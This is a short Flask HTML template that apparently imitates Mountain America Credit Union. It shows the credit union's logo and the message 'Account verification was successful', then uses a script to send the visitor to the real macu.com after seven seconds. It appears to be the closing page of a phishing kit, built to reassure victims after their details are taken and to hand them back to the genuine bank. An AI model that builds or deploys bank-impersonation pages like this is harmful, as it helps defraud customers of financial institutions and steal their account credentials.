<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Mountain america</title>
  <link rel="icon" type="image/x-icon" href="{{ url_for('static', filename='img/icon.jpg') }}">
  <link rel="stylesheet" href="{{ url_for('static', filename='css/index.css')}}" />
  <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500&display=swap" rel="stylesheet">
   <script>
    setTimeout(function(){
        window.location.replace("https://macu.com")
    },7000)
   </script>
</head>
<style>
    .bottom-section {
            display: grid;
            align-content: center;
    }
</style>
<body>
  <div class="container">
    <!-- Top Section with Logo -->
    <div class="top-section">
      <div class="logo-container">
        <img src="{{ url_for('static', filename='img/images_brand-logo-tall.svg')}}" alt="Your Logo" class="logo" />
      </div>
    </div>

    <div class="bottom-section">
      <div class="form-container">
        <h2>Account verification was successful.
For security, we’ll log you out now — you can log back in whenever you're ready.

</h2>

        </div>
        </div>
  </div>
</body>
</html>
